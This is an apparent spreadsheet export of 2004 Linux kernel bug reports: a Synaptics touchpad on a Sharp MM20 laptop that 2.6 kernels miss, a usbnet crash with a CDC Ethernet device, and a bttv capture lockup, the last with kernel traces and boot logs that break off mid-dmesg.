    <t>Distribution: Fedora Core 1 + Fedora Core 2 Test 3 Hardware Environment: Sharp MM20 Laptop, Efficeon Processor, ATI Radeon, Synaptics Touch pad Software Environment: XFree86 4.3, With and Without Syanptics Linux driver 11.0 - 13.2 Problem Description: The 2.6.0 Kernels do not recognize the Synaptics Touchpad on the Sharp MM20 laptop computer. The Touchpad is recognized and fully functional under the 2.4.22 kernel (maybe others, haven't tested). I have run the 2.6.6 kernel under Fedora Core 1 and experienced the lack of touchpad (X starts but no mouse movement, cat'ing devices recieves no data). I recieve the same problem with the 2.6.5 kernel that comes with Fedora Core 2 Test 3 (install won't start because it can't find the mouse). Have tried multiple kernel boot options (pci=noacpi, psmouse.proto=imps, acpi=off, psmouse_noext=1) and with and without the Synaptice Touchpad driver (Synaptics driver works perfectly under 2.4.22 kernel). Kernel was compiled with psmouse and evdev as modules and as kernel. Steps to reproduce: Boot with any 2.6.x series kernel on the Sharp MM20 laptop. Steps to solve: I have found that adding this kernel command "i8042.nomux" to the grub boot loader, brings back the mouse and solves the problem. Now in dmesg I can see the kernel finding the Synaptics touchpad, where before dmesg showed no Synaptics touchpad.</t>
  </si>
  <si>
    <t>bad string fetches (break usbnet)</t>
  </si>
  <si>
    <t>2004-05-15 01:26 UTC</t>
  </si>
  <si>
    <t>Christian Casteyde</t>
  </si>
  <si>
    <t>2004-11-11 03:58 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 9.1/current with compiled from source 2.6.6 kernel Hardware Environment: Laptop Toshiba M30 Software Environment: GNU/Linux Problem Description: Crash when connected CDCEther compatible device at module load Steps to reproduce: 1. Plug-in the CDC Ethernet compatible device 2. Load the usbnet module 3. Nothing happened. Managed to get a dmesg, the kernel crashed soon afterwards. dmesg output is not available here (I do not have the laptop anymore now). dmesg showed a bad formatted message, there was remaining "%d" in it, maybe that is the cause of the crash, when I issued the dmesg command. Anyway, the usbX network interface never showed up. The USB device connected is a "Freebox V2" from french ISP Free (very common device in France). Supposed to work nicely with 2.4 kernels (didn't had enough time to test, but many reports from users seems to indicate it works).</t>
  </si>
  <si>
    <t>bttv: process related lock can occur when interrupting a video capture.</t>
  </si>
  <si>
    <t>2004-05-16 16:21 UTC</t>
  </si>
  <si>
    <t>Per Weijnitz</t>
  </si>
  <si>
    <t>2004-08-14 13:29 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian GNU/Linux i386 testing Hardware Environment: Shuttle ST62K (P4 based barebone machine). Pinnacle PCTV (TV capture card). Software Environment: mencoder (commandline tool for capturing&amp;encoding) Problem Description: [I put listings last, in a kind of appendix] I am using mencoder to record videos from the Pinnacle Rage TV-card. When I stop the capture (mostly Ctrl-c), it often locks with some error message (listed below). After that point, a part of the system works: you can still start new programs, and running programs continue to work. But you cannot use any process related command, like top, ps etc. 'ps ax' starts to list, but freezes badly when it reaches the mencoder process (but only freezes that terminal). Then the system won't shut down properly, as the init scripts probably does stuff with processes ;) Steps to reproduce: Tune in to some channel using for example xawtv. Exit the tuning program, and start mencoder. I use the following command: mencoder tv:// -tv driver=v4l2:input=0:norm=pal:channel=36:chanlist=europe-west:width=768:height=576:outfmt=yuy2:device=/dev/video0:adevice=/dev/dsp:audiorate=32000:forceaudio:forcechan=1:buffersize=64 -ovc lavc -lavcopts vcodec=mpeg4:vbitrate=2000:keyint=30 -oac mp3lame -lameopts br=128:cbr:mode=3 -ffourcc divx -endpos 229 -vf pp=lb -o /tmp/video.avi Then press Ctrl-c after some seconds. Repeat until bug occurs, generally between within the first to the sixth attempt. The appendix below contains these sections: * error message in syslog * lspci * dmesg * mencoder version ------ APPENDIX ------ ---- Error message you get in the syslog when the error occurs: ---- Please note that even though I only included parts of it here ---- it goes on and on, and not only for 'mencoder' (it says below ---- "(in process 'mencoder' ...", but also for other active processes ---- like ssh etc. May 17 01:03:36 pvr kernel: Bad page state at free_hot_cold_page (in process 'mencoder', page c11a00a0) May 17 01:03:36 pvr kernel: flags:0x20110004 mapping:00000000 mapped:1 count:0 May 17 01:03:36 pvr kernel: Backtrace: May 17 01:03:36 pvr kernel: Call Trace: May 17 01:03:36 pvr kernel: [bad_page+110/150] bad_page+0x6e/0x96 May 17 01:03:36 pvr kernel: [free_hot_cold_page+99/268] free_hot_cold_page+0x63/0x10c May 17 01:03:36 pvr kernel: [default_wake_function+0/12] default_wake_function+0x0/0xc May 17 01:03:36 pvr kernel: [pg0+240313765/1069043712] videobuf_dma_free+0x92/0x9e [video_buf] May 17 01:03:36 pvr kernel: [pg0+240515668/1069043712] bttv_dma_free+0x48/0x78 [bttv] May 17 01:03:36 pvr kernel: [pg0+240318503/1069043712] videobuf_vm_close+0x88/0xba [video_buf] May 17 01:03:36 pvr kernel: [unmap_region+316/325] unmap_region+0x13c/0x145 May 17 01:03:36 pvr kernel: [unmap_vma+100/102] unmap_vma+0x64/0x66 May 17 01:03:36 pvr kernel: [unmap_vma_list+14/23] unmap_vma_list+0xe/0x17 May 17 01:03:36 pvr kernel: [do_munmap+301/364] do_munmap+0x12d/0x16c May 17 01:03:36 pvr kernel: [sys_munmap+65/101] sys_munmap+0x41/0x65 May 17 01:03:36 pvr kernel: [syscall_call+7/11] syscall_call+0x7/0xb May 17 01:03:36 pvr kernel: May 17 01:03:36 pvr kernel: Trying to fix it up, but a reboot is needed May 17 01:03:36 pvr kernel: Bad page state at free_hot_cold_page (in process 'mencoder', page c10db880) May 17 01:03:36 pvr kernel: flags:0x20110004 mapping:00000000 mapped:1 count:0 May 17 01:03:36 pvr kernel: Backtrace: May 17 01:03:36 pvr kernel: Call Trace: May 17 01:03:36 pvr kernel: [bad_page+110/150] bad_page+0x6e/0x96 May 17 01:03:36 pvr kernel: [free_hot_cold_page+99/268] free_hot_cold_page+0x63/0x10c May 17 01:03:36 pvr kernel: [pg0+240313765/1069043712] videobuf_dma_free+0x92/0x9e [video_buf] May 17 01:03:36 pvr kernel: [pg0+240515668/1069043712] bttv_dma_free+0x48/0x78 [bttv] May 17 01:03:36 pvr kernel: [pg0+240318503/1069043712] videobuf_vm_close+0x88/0xba [video_buf] May 17 01:03:36 pvr kernel: [unmap_region+316/325] unmap_region+0x13c/0x145 May 17 01:03:36 pvr kernel: [unmap_vma+100/102] unmap_vma+0x64/0x66 May 17 01:03:36 pvr kernel: [unmap_vma_list+14/23] unmap_vma_list+0xe/0x17 May 17 01:03:36 pvr kernel: Bad page state at prep_new_page (in process 'klogd', page c11a00a0) May 17 01:03:36 pvr kernel: flags:0x20010004 mapping:00000000 mapped:1 count:0 May 17 01:03:36 pvr kernel: Backtrace: May 17 01:03:36 pvr kernel: Call Trace: May 17 01:03:36 pvr kernel: [bad_page+110/150] bad_page+0x6e/0x96 May 17 01:03:36 pvr kernel: [prep_new_page+38/63] prep_new_page+0x26/0x3f May 17 01:03:36 pvr kernel: [buffered_rmqueue+262/496] buffered_rmqueue+0x106/0x1f0 May 17 01:03:36 pvr kernel: [__alloc_pages+142/707] __alloc_pages+0x8e/0x2c3 May 17 01:03:36 pvr kernel: [__get_free_pages+31/59] __get_free_pages+0x1f/0x3b May 17 01:03:36 pvr kernel: [cache_grow+195/726] cache_grow+0xc3/0x2d6 May 17 01:03:36 pvr kernel: [cache_alloc_refill+434/639] cache_alloc_refill+0x1b2/0x27f May 17 01:03:36 pvr kernel: [__kmalloc+124/131] __kmalloc+0x7c/0x83 May 17 01:03:36 pvr kernel: [alloc_skb+50/195] alloc_skb+0x32/0xc3 May 17 01:03:36 pvr kernel: [sock_alloc_send_pskb+191/473] [do_munmap+301/364] do_munmap+0x12d/0x16c May 17 01:03:36 pvr kernel: [sys_munmap+65/101] sys_munmap+0x41/0x65 May 17 01:03:36 pvr kernel: [syscall_call+7/11] syscall_call+0x7/0xb ---- lspci 0000:00:00.0 Host bridge: ATI Technologies Inc: Unknown device 5833 (rev 02) 0000:00:01.0 PCI bridge: ATI Technologies Inc: Unknown device 5838 0000:00:13.0 USB Controller: ATI Technologies Inc: Unknown device 4347 (rev 01) 0000:00:13.1 USB Controller: ATI Technologies Inc: Unknown device 4348 (rev 01) 0000:00:13.2 USB Controller: ATI Technologies Inc: Unknown device 4345 (rev 01) 0000:00:14.0 SMBus: ATI Technologies Inc ATI SMBus (rev 17) 0000:00:14.1 IDE interface: ATI Technologies Inc: Unknown device 4349 0000:00:14.3 ISA bridge: ATI Technologies Inc: Unknown device 434c 0000:00:14.4 PCI bridge: ATI Technologies Inc: Unknown device 4342 0000:00:14.5 Multimedia audio controller: ATI Technologies Inc SoundMAX Integrated Digital Audio 0000:01:05.0 VGA compatible controller: ATI Technologies Inc: Unknown device 5834 0000:02:05.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) 0000:02:06.0 FireWire (IEEE 1394): VIA Technologies, Inc. IEEE 1394 Host Controller (rev 80) 0000:02:07.0 Multimedia video controller: Brooktree Corporation Bt878 Video Capture (rev 11) 0000:02:07.1 Multimedia controller: Brooktree Corporation Bt878 Audio Capture (rev 11) ---- dmesg: May 16 16:32:30 pvr syslogd 1.4.1#10: restart. May 16 16:32:30 pvr kernel: klogd 1.4.1#10, log source = /proc/kmsg started. May 16 16:32:30 pvr kernel: Inspecting /boot/System.map-2.6.6.1 May 16 16:32:30 pvr kernel: Loaded 26665 symbols from /boot/System.map-2.6.6.1. May 16 16:32:30 pvr kernel: Symbols match kernel version 2.6.6. May 16 16:32:30 pvr kernel: No module symbols loaded - kernel modules not enabled. May 16 16:32:30 pvr kernel: Linux version 2.6.6.1 (root@pvr) (gcc version 3.3.3 (Debian 20040401)) #1 SMP Thu May 13 08:44:51 CEST 2004 May 16 16:32:30 pvr kernel: BIOS-provided physical RAM map: May 16 16:32:30 pvr kernel: BIOS-e820: 0000000000000000 - 000000000009fc00 (usable) May 16 16:32:30 pvr kernel: BIOS-e820: 000000000009fc00 - 00000000000a0000 (reserved) May 16 16:32:30 pvr kernel: BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) May 16 16:32:30 pvr kernel: BIOS-e820: 0000000000100000 - 000000000def0000 (usable) May 16 16:32:30 pvr kernel: BIOS-e820: 000000000def0000 - 000000000def3000 (ACPI NVS) May 16 16:32:30 pvr kernel: BIOS-e820: 000000000def3000 - 000000000df00000 (ACPI data) May 16 16:32:30 pvr kernel: BIOS-e820: 00000000fec00000 - 0000000100000000 (reserved) May 16 16:32:30 pvr kernel: 222MB LOWMEM available. May 16 16:32:30 pvr kernel: found SMP MP-table at 000f4dc0 May 16 16:32:30 pvr kernel: On node 0 totalpages: 57072 May 16 16:32:30 pvr kernel: DMA zone: 4096 pages, LIFO batch:1 May 16 16:32:30 pvr kernel: Normal zone: 52976 pages, LIFO batch:12 May 16 16:32:30 pvr kernel: HighMem zone: 0 pages, LIFO batch:1 May 16 16:32:30 pvr kernel: DMI 2.2 present. May 16 16:32:30 pvr kernel: ACPI: RSDP (v000 XPC ) @ 0x000f6880 May 16 16:32:30 pvr kernel: ACPI: RSDT (v001 XPC AWRDACPI 0x42302e31 AWRD 0x00000000) @ 0x0def3000 May 16 16:32:30 pvr kernel: ACPI: FADT (v001 XPC AWRDACPI 0x42302e31 AWRD 0x00000000) @ 0x0def3040 May 16 16:32:30 pvr kernel: ACPI: MADT (v001 XPC AWRDACPI 0x42302e31 AWRD 0x00000000) @ 0x0def6240 May 16 16:32:30 pvr kernel: ACPI: DSDT (v001 XPC ST62 0x00001000 MSFT 0x0100000e) @ 0x00000000 May 16 16:32:30 pvr kernel: ACPI: PM-Timer IO Port: 0x4008 May 16 16:32:30 pvr kernel: ACPI: Local APIC address 0xfee00000 May 16 16:32:30 pvr kernel: ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled) May 16 16:32:30 pvr kernel: Processor #0 15:2 APIC version 20 May 16 16:32:30 pvr kernel: ACPI: LAPIC (acpi_id[0x01] lapic_id[0x01] enabled) May 16 16:32:30 pvr kernel: Processor #1 15:2 APIC version 20 May 16 16:32:30 pvr kernel: ACPI: LAPIC_NMI (acpi_id[0x00] high edge lint[0x1]) May 16 16:32:30 pvr kernel: ACPI: LAPIC_NMI (acpi_id[0x01] high edge lint[0x1]) May 16 16:32:30 pvr kernel: ACPI: IOAPIC (id[0x02] address[0xfec00000] global_irq_base[0x0]) May 16 16:32:30 pvr kernel: IOAPIC[0]: Assigned apic_id 2 May 16 16:32:30 pvr kernel: IOAPIC[0]: apic_id 2, version 17, address 0xfec00000, GSI 0-23 May 16 16:32:30 pvr kernel: ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) May 16 16:32:30 pvr kernel: ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 21 low level) May 16 16:32:30 pvr kernel: Enabling APIC mode: Flat. Using 1 I/O APICs May 16 16:32:30 pvr kernel: Using ACPI (MADT) for SMP configuration information May 16 16:32:30 pvr kernel: Built 1 zonelists May 16 16:32:30 pvr kernel: Kernel command line: root=/dev/hda4 ro May 16 16:32:30 pvr kernel: Initializing CPU#0 May 16 16:32:30 pvr kernel: PID hash table entries: 1024 (order 10: 8192 bytes) May 16 16:32:30 pvr kernel: Detected 2395.055 MHz processor. May 16 16:32:30 pvr kernel: Using pmtmr for high-res timesource May 16 16:32:30 pvr kernel: Console: colour VGA+ 80x25 May 16 16:32:30 pvr kernel: Memory: 221900k/228288k available (2205k kernel code, 5688k reserved, 979k data, 168k init, 0k highmem) May 16 16:32:30 pvr kernel: Checking if this processor honours the WP bit even in supervisor mode... Ok. May 16 16:32:30 pvr kernel: Calibrating delay loop... 4751.36 BogoMIPS May 16 16:32:30 pvr kernel: Dentry cache hash table entries: 32768 (order: 5, 131072 bytes) May 16 16:32:30 pvr kernel: Inode-cache hash table entries: 16384 (order: 4, 65536 bytes) May 16 16:32:30 pvr kernel: Mount-cache hash table entries: 512 (order: 0, 4096 bytes) May 16 16:32:30 pvr kernel: CPU: After generic identify, caps: bfebfbff 00000000 00000000 00000000 May 16 16:32:30 pvr kernel: CPU: After vendor identify, caps: bfebfbff 00000000 00000000 00000000 May 16 16:32:30 pvr kernel: CPU: Trace cache: 12K uops, L1 D cache: 8K May 16 16:32:30 pvr kernel: CPU: L2 cache: 512K May 16 16:32:30 pvr kernel: CPU: Physical Processor ID: 0 May 16 16:32:30 pvr kernel: CPU: After all inits, caps: bfebfbff 00000000 00000000 00000080 May 16 16:32:30 pvr kernel: Intel machine check architecture supported. May 16 16:32:30 pvr kernel: Intel machine check reporting enabled on CPU#0. May 16 16:32:30 pvr kernel: CPU#0: Intel P4/Xeon Extended MCE MSRs (12) available May 16 16:32:30 pvr kernel: CPU#0: Thermal monitoring enabled May 16 16:32:30 pvr kernel: Enabling fast FPU save and restore... done. May 16 16:32:30 pvr kernel: Enabling unmasked SIMD FPU exception support... done. May 16 16:32:30 pvr kernel: Checking 'hlt' instruction... OK. May 16 16:32:30 pvr kernel: POSIX conformance testing by UNIFIX May 16 16:32:30 pvr kernel: CPU0: Intel(R) Pentium(R) 4 CPU 2.40GHz stepping 09 May 16 16:32:30 pvr kernel: per-CPU timeslice cutoff: 1462.31 usecs. May 16 16:32:30 pvr kernel: task migration cache decay timeout: 2 msecs. May 16 16:32:30 pvr kernel: enabled ExtINT on CPU#0 May 16 16:32:30 pvr kernel: ESR value before enabling vector: 00000000 May 16 16:32:30 pvr kernel: ESR value after enabling vector: 00000000 May 16 16:32:30 pvr kernel: Booting processor 1/1 eip 3000 May 16 16:32:30 pvr kernel: Initializing CPU#1 May 16 16:32:30 pvr kernel: masked ExtINT on CPU#1 May 16 16:32:30 pvr kernel: ESR value before enabling vector: 00000000 May 16 16:32:30 pvr kernel: ESR value after enabling vector: 00000000 May 16 16:32:30 pvr kernel: Calibrating delay loop... 4784.12 BogoMIPS May 16 16:32:30 pvr kernel: CPU: After generic identify, caps: bfebfbff 00000000 00000000 00000000 May 16 16:32:30 pvr kernel: CPU: After vendor identify, caps: bfebfbff 00000000 00000000 00000000 May 16 16:32:30 pvr kernel: CPU: Trace cache: 12K uops, L1 D cache: 8K May 16 16:32:30 pvr kernel: CPU: L2 cache: 512K May 16 16:32:30 pvr kernel: CPU: Physical Processor ID: 0 May 16 16:32:30 pvr kernel: CPU: After all inits, caps: bfebfbff 00000000 00000000 00000080 May 16 16:32:30 pvr kernel: Intel machine check architecture supported. May 16 16:32:30 pvr kernel: Intel machine check reporting enabled on CPU#1. May 16 16:32:30 pvr kernel: CPU#1: Intel P4/Xeon Extended MCE MSRs (12) available May 16 16:32:30 pvr kernel: CPU#1: Thermal monitoring enabled May 16 16:32:30 pvr kernel: CPU1: Intel(R) Pentium(R) 4 CPU 2.40GHz stepping 09 May 16 16:32:30 pvr kernel: Total of 2 processors activated (9535.48 BogoMIPS). May 16 16:32:30 pvr kernel: cpu_sibling_map[0] = 1 May 16 16:32:30 pvr kernel: cpu_sibling_map[1] = 0 May 16 16:32:30 pvr kernel: ENABLING IO-APIC IRQs May 16 16:32:30 pvr kernel: init IO_APIC IRQs May 16 16:32:30 pvr kernel: IO-APIC (apicid-pin) 2-0, 2-16, 2-17, 2-18, 2-19, 2-20, 2-22, 2-23 not connected. May 16 16:32:30 pvr kernel: ..TIMER: vector=0x31 pin1=2 pin2=-1 May 16 16:32:30 pvr kernel: Using local APIC timer interrupts. May 16 16:32:30 pvr kernel: calibrating APIC timer ... May 16 16:32:30 pvr kernel: ..... CPU clock speed is 2394.0094 MHz. May 16 16:32:30 pvr kernel: ..... host bus clock speed is 199.0507 MHz. May 16 16:32:30 pvr kernel: checking TSC synchronization across 2 CPUs: passed. May 16 16:32:30 pvr kernel: Brought up 2 CPUs May 16 16:32:30 pvr kernel: NET: Registered protocol family 16 May 16 16:32:30 pvr kernel: PCI: PCI BIOS revision 2.10 entry at 0xfae60, last bus=2 May 16 16:32:30 pvr kernel: PCI: Using configuration type 1 May 16 16:32:30 pvr kernel: mtrr: v2.0 (20020519) May 16 16:32:30 pvr kernel: ACPI: Subsystem revision 20040326 May 16 16:32:30 pvr kernel: ACPI: Interpreter enabled May 16 16:32:30 pvr kernel: ACPI: Using IOAPIC for interrupt routing May 16 16:32:30 pvr kernel: ACPI: PCI Root Bridge [PCI0] (00:00) May 16 16:32:30 pvr kernel: PCI: Probing PCI hardware (bus 00) May 16 16:32:30 pvr kernel: PCI: Ignoring BAR0-3 of IDE controller 0000:00:14.1 May 16 16:32:30 pvr kernel: Transparent bridge - 0000:00:14.4 May 16 16:32:30 pvr kernel: ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] May 16 16:32:30 pvr kernel: ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 6 7 10 11) *0, disabled. May 16 16:32:30 pvr kernel: ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 5 6 7 10 11) *0, disabled. May 16 16:32:30 pvr kernel: ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 5 6 7 10 11) *0, disabled. May 16 16:32:30 pvr kernel: ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 5 6 7 10 11) *0, disabled. May 16 16:32:30 pvr kernel: ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P2P_._PRT] May 16 16:32:30 pvr kernel: ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.AGP_._PRT] May 16 16:32:30 pvr kernel: Linux Plug and Play Support v0.97 (c) Adam Belay May 16 16:32:30 pvr kernel: SCSI subsystem initialized May 16 16:32:30 pvr kernel: usbcore: registered new driver usbfs May 16 16:32:30 pvr kernel: usbcore: registered new driver hub May 16 16:32:30 pvr kernel: 00:00:0e[A] -&gt; 2-17 -&gt; IRQ 17 level low May 16 16:32:30 pvr kernel: 00:00:0e[B] -&gt; 2-18 -&gt; IRQ 18 level low May 16 16:32:30 pvr kernel: 00:00:0e[C] -&gt; 2-19 -&gt; IRQ 19 level low May 16 16:32:30 pvr kernel: 00:00:0e[D] -&gt; 2-16 -&gt; IRQ 16 level low May 16 16:32:30 pvr kernel: number of MP IRQ sources: 16. May 16 16:32:30 pvr kernel: number of IO-APIC #2 registers: 24. May 16 16:32:30 pvr kernel: testing the IO APIC....................... May 16 16:32:30 pvr kernel: IO APIC #2...... May 16 16:32:30 pvr kernel: .... register #00: 02000000 May 16 16:32:30 pvr kernel: ....... : physical APIC id: 02 May 16 16:32:30 pvr kernel: ....... : Delivery Type: 0 May 16 16:32:30 pvr kernel: ....... : LTS : 0 May 16 16:32:30 pvr kernel: .... register #01: 00170011 May 16 16:32:30 pvr kernel: ....... : max redirection entries: 0017 May 16 16:32:30 pvr kernel: ....... : PRQ implemented: 0 May 16 16:32:30 pvr kernel: ....... : IO APIC version: 0011 May 16 16:32:30 pvr kernel: .... register #02: 02000000 May 16 16:32:30 pvr kernel: ....... : arbitration: 02 May 16 16:32:30 pvr kernel: .... IRQ redirection table: May 16 16:32:30 pvr kernel: NR Log Phy Mask Trig IRR Pol Stat Dest Deli Vect: May 16 16:32:30 pvr kernel: 00 000 00 1 0 0 0 0 0 0 00 May 16 16:32:30 pvr kernel: 01 0FF 0F 0 0 0 0 0 1 1 39 May 16 16:32:30 pvr kernel: 02 0FF 0F 0 0 0 0 0 1 1 31 May 16 16:32:30 pvr kernel: 03 0FF 0F 0 0 0 0 0 1 1 41 May 16 16:32:30 pvr kernel: 04 0FF 0F 0 0 0 0 0 1 1 49 May 16 16:32:30 pvr kernel: 05 0FF 0F 0 0 0 0 0 1 1 51 May 16 16:32:30 pvr kernel: 06 0FF 0F 0 0 0 0 0 1 1 59 May 16 16:32:30 pvr kernel: 07 0FF 0F 0 0 0 0 0 1 1 61 May 16 16:32:30 pvr kernel: 08 0FF 0F 0 0 0 0 0 1 1 69 May 16 16:32:30 pvr kernel: 09 0FF 0F 0 0 0 0 0 1 1 71 May 16 16:32:30 pvr kernel: 0a 0FF 0F 0 0 0 0 0 1 1 79 May 16 16:32:30 pvr kernel: 0b 0FF 0F 0 0 0 0 0 1 1 81 May 16 16:32:30 pvr kernel: 0c 0FF 0F 0 0 0 0 0 1 1 89 May 16 16:32:30 pvr kernel: 0d 0FF 0F 0 0 0 0 0 1 1 91 May 16 16:32:30 pvr kernel: 0e 0FF 0F 0 0 0 0 0 1 1 99 May 16 16:32:30 pvr kernel: 0f 0FF 0F 0 0 0 0 0 1 1 A1 May 16 16:32:30 pvr kernel: 10 003 03 1 1 0 1 0 1 1 C9 May 16 16:32:30 pvr kernel: 11 003 03 1 1 0 1 0 1 1 B1 May 16 16:32:30 pvr kernel: 12 003 03 1 1 0 1 0 1 1 B9 May 16 16:32:30 pvr kernel: 13 003 03 1 1 0 1 0 1 1 C1 May 16 16:32:30 pvr kernel: 14 000 00 1 0 0 0 0 0 0 00 May 16 16:32:30 pvr kernel: 15 0FF 0F 0 1 0 1 0 1 1 A9 May 16 16:32:30 pvr kernel: 16 000 00 1 0 0 0 0 0 0 00 May 16 16:32:30 pvr kernel: 17 000 00 1 0 0 0 0 0 0 00 May 16 16:32:30 pvr kernel: IRQ to pin mappings: May 16 16:32:30 pvr kernel: IRQ0 -&gt; 0:2 May 16 16:32:30 pvr kernel: IRQ1 -&gt; 0:1 May 16 16:32:30 pvr kernel: IRQ3 -&gt; 0:3 May 16 16:32:30 pvr kernel: IRQ4 -&gt; 0:4 May 16 16:32:30 pvr kernel: IRQ5 -&gt; 0:5 May 16 16:32:30 pvr kernel: IRQ6 -&gt; 0:6 May 16 16:32:30 pvr kernel: IRQ7 -&gt; 0:7 May 16 16:32:30 pvr kernel: IRQ8 -&gt; 0:8 May 16 16:32:30 pvr kernel: IRQ9 -&gt; 0:9 May 16 16:32:30 pvr kernel: IRQ10 -&gt; 0:10 May 16 16:32:30 pvr kernel: IRQ11 -&gt; 0:11 May 16 16:32:30 pvr kernel: IRQ12 -&gt; 0:12 May 16 16:32:30 pvr kernel: IRQ13 -&gt; 0:13 May 16 16:32:30 pvr kernel: IRQ14 -&gt; 0:14 May 16 16:32:30 pvr kernel: IRQ15 -&gt; 0:15 May 16 16:32:30 pvr kernel: IRQ16 -&gt; 0:16 May 16 16:32:30 pvr kernel: IRQ17 -&gt; 0:17 May 16 16:32:30 pvr kernel: IRQ18 -&gt; 0:18 May 16 16:32:30 pvr kernel: IRQ19 -&gt; 0:19 May 16 16:32:30 pvr kernel: IRQ21 -&gt; 0:21 May 16 16:32:30 pvr kernel: .................................... done. May 16 16:32:30 pvr kernel: PCI: Using ACPI for IRQ routing May 16 16:32:30 pvr kernel: Machine check exception polling timer started. May 16 16:32:30 pvr kernel: Starting balanced_irq May 16 16:32:30 pvr kernel: devfs: 2004-01-31 Richard Gooch (rgooch@atnf.csiro.au) May 16 16:32:30 pvr kernel: devfs: boot_options: 0x1 May 16 16:32:30 pvr kernel: NTFS driver 2.1.8 [Flags: R/W]. May 16 16:32:30 pvr kernel: udf: registering filesystem May 16 16:32:30 pvr kernel: Initializing Cryptographic API May 16 16:32:30 pvr kernel: ACPI: Power Button (FF) [PWRF] May 16 16:32:30 pvr kernel: ACPI: Fan [FAN] (on) May 16 16:32:30 pvr kernel: ACPI: Processor [CPU0] (supports C1, 8 throttling states) May 16 16:32:30 pvr kernel: ACPI: Processor [CPU1] (supports C1, 8 throttling states) May 16 16:32:30 pvr kernel: ACPI: Thermal Zone [THRM] (44 C) May 16 16:32:30 pvr kernel: Real Time Clock Driver v1.12 May 16 16:32:30 pvr kernel: Linux agpgart interface v0.100 (c) Dave Jones May 16 16:32:30 pvr kernel: agpgart: Detected Ati IGP9100/M chipset May 16 16:32:30 pvr kernel: agpgart: Maximum main memory to use for agp memory: 175M May 16 16:32:30 pvr kernel: agpgart: AGP aperture is 64M @ 0xe4000000 May 16 16:32:30 pvr kernel: [drm] Initialized radeon 1.9.0 20020828 on minor 0 May 16 16:32:30 pvr kernel: Serial: 8250/16550 driver $Revision: 1.90 $ 8 ports, IRQ sharing disabled May 16 16:32:30 pvr kernel: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A May 16 16:32:30 pvr kernel: Using anticipatory io scheduler May 16 16:32:30 pvr kernel: Floppy drive(s): fd1 is 2.88M AMI BIOS May 16 16:32:30 pvr kernel: floppy0: no floppy controllers found May 16 16:32:30 pvr kernel: 8139too Fast Ethernet driver 0.9.27 May 16 16:32:30 pvr kernel: eth0: RealTek RTL8139 at 0xce830000, 00:30:1b:b2:e3:bc, IRQ 17 May 16 16:32:30 pvr kernel: eth0: Identified 8139 chip type 'RTL-8100B/8139D' May 16 16:32:30 pvr kernel: Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 May 16 16:32:30 pvr kernel: ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx May 16 16:32:30 pvr kernel: ATIIXP: IDE controller at PCI slot 0000:00:14.1 May 16 16:32:30 pvr kernel: ATIIXP: chipset revision 0 May 16 16:32:30 pvr kernel: ATIIXP: not 100%% native mode: will probe irqs later May 16 16:32:30 pvr kernel: ide0: BM-DMA at 0xf000-0xf007, BIOS settings: hda:DMA, hdb:pio May 16 16:32:30 pvr kernel: ide1: BM-DMA at 0xf008-0xf00f, BIOS settings: hdc:DMA, hdd:pio May 16 16:32:30 pvr kernel: hda: ST3160023A, ATA DISK drive May 16 16:32:30 pvr kernel: ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 May 16 16:32:30 pvr kernel: hdc: HL-DT-ST GCE-8480B, ATAPI CD/DVD-ROM drive May 16 16:32:30 pvr kernel: ide1 at 0x170-0x177,0x376 on irq 15 May 16 16:32:30 pvr kernel: hda: max request size: 1024KiB May 16 16:32:30 pvr kernel: hda: 312581808 sectors (160041 MB) w/8192KiB Cache, CHS=19457/255/63, UDMA(100) May 16 16:32:30 pvr kernel: /dev/ide/host0/bus0/target0/lun0: p1 p2 p3 p4 May 16 16:32:30 pvr kernel: hdc: ATAPI 40X CD-ROM CD-R/RW CD-MRW drive, 2048kB Cache, UDMA(33) May 16 16:32:30 pvr kernel: Uniform CD-ROM driver Revision: 3.20 May 16 16:32:30 pvr kernel: libata version 1.02 loaded. May 16 16:32:30 pvr kernel: ehci_hcd 0000:00:13.2: PCI device 1002:4345 (ATI Technologies Inc) May 16 16:32:30 pvr kernel: ehci_hcd 0000:00:13.2: irq 19, pci mem ce836000 May 16 16:32:30 pvr kernel: ehci_hcd 0000:00:13.2: new USB bus registered, assigned bus number 1 May 16 16:32:30 pvr kernel: ehci_hcd 0000:00:13.2: USB 2.0 enabled, EHCI 1.00, driver 2003-Dec-29 May 16 16:32:30 pvr kernel: hub 1-0:1.0: USB hub found May 16 16:32:30 pvr kernel: hub 1-0:1.0: 6 ports detected May 16 16:32:30 pvr kernel: ohci_hcd: 2004 Feb 02 USB 1.1 'Open' Host Controller (OHCI) Driver (PCI) May 16 16:32:30 pvr kernel: ohci_hcd: block sizes: ed 64 td 64 May 16 16:32:30 pvr kernel: ohci_hcd 0000:00:13.0: PCI device 1002:4347 (ATI Technologies Inc) May 16 16:32:30 pvr kernel: ohci_hcd 0000:00:13.0: irq 19, pci mem ce838000 May 16 16:32:30 pvr kernel: ohci_hcd 0000:00:13.0: new USB bus registered, assigned bus number 2 May 16 16:32:30 pvr kernel: hub 2-0:1.0: USB hub found May 16 16:32:30 pvr kernel: hub 2-0:1.0: 3 ports detected May 16 16:32:30 pvr kernel: ohci_hcd 0000:00:13.1: PCI device 1002:4348 (ATI Technologies Inc) May 16 16:32:30 pvr kernel: ohci_hcd 0000:00:13.1: irq 19, pci mem ce83a000 May 16 16:32:30 pvr kernel: ohci_hcd 0000:00:13.1: new USB bus registered, assigned bus number 3 May 16 16:32:30 pvr kernel: hub 3-0:1.0: USB hub found May 16 16:32:30 pvr kernel: hub 3-0:1.0: 3 ports detected May 16 16:32:30 pvr kernel: USB Universal Host Controller Interface driver v2.2 May 